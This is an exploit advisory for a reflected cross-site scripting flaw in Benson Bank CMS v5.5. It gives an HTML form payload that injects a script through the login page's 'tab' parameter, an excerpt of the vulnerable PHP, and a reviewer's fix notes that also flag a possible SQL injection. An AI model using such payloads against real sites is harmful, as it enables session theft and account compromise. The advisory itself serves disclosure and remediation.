Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting
*=============================================================|
| Exploit Title: Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://topnew.net
|
| Download Link : http://downloads.sourceforge.net/sidu/bank55.zip
|
| Version : v 5.5 - 2015.09.09
|
| Tested on: Kali Linux
|
| Date: 1 /1 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD><TITLE>Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting</TITLE></HEAD>
|<BODY>
|<form action="http://127.0.0.1/7/bank55/login.php" method="get">
| <input type="hidden" name="tab" value="Login'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>"/>
|</form>
|</BODY>
|</HTML>
*=======================|
|Vulnerable code :
|
|function main($u, $p, $p1, $p2, $tab) {
|    if ($u == 'logout') {
|        global $pin;
|        $u = $pin[0];
|        if ($u) {
|            cms_sql('update', 'bsb_account', null, null, "sid='$u.$u',updated='".date('Y-m-d H:i:s')."' where pid=$u");
|            setcookie('BSB', '', time() - 1);
|        }
|    }
|    $u = ceil($u); $p = trim($p);
|    if ($u < 1) $u = '';
|    if ($tab == 'Login' && $u && $p) {
|        $err = valid_data_login($u, $p);
|        if (!$err) return main_jump_login($u, $auto, $url);
|    }
|    uppe();
|    $tabs = array('Login'=>lang(2505), 'Apply'=>lang(2507), 'PWD'=>lang(2506), 'Change'=>lang(2513));
|    echo cms_form(), "<div style='max-width:400px;margin:0 auto'>";
|    nav1_guest($tab);
|    echo "<ul class='tab'>";
|    if (!$tab) $tab = 'Login';
|    foreach ($tabs as $k => $v) echo ($k == $tab ? "<li class='on'>$v</li>" : "<li><a href='login.php?tab=$k'>$v</a></li>");
|    echo "</ul><div class='tab'>";
|    if ($tab == 'Login') main_form_login($u, $p, $err);
|    elseif ($tab == 'Apply') main_apply($u, $p, $p1);
|    elseif ($tab == 'PWD') main_pwd($u);
|    elseif ($tab == 'Change') main_change($u, $p, $p1, $p2);
|    echo '</div></div></form>';
|    down();
|}
|
*=======================|
|Reviewer note :
|
| The quoted main() only compares $tab with the fixed keys of $tabs; the links it
| prints are built from those keys ($k), not from the request value. The point
| where the "tab" parameter is written back into the page is therefore not in
| this excerpt. $tab is handed unvalidated to nav1_guest($tab) before it is
| defaulted, so that helper (or cms_form()) is presumably where it is echoed
| unescaped; their bodies are not shown here.
| Fix: at the top of main(), accept $tab only if it is a key of $tabs (fall back
| to 'Login' otherwise), and pass every request-derived value through
| htmlspecialchars($value, ENT_QUOTES, 'UTF-8') where it is written into HTML.
| Separately, the logout branch interpolates $u (taken from the global $pin[0])
| straight into the string given to cms_sql(); whether $pin can be influenced by
| the client is not visible here, but that update is worth checking too.
|
*=============================================================|
| Discovered By : M.R.S.L.Y
*=============================================================|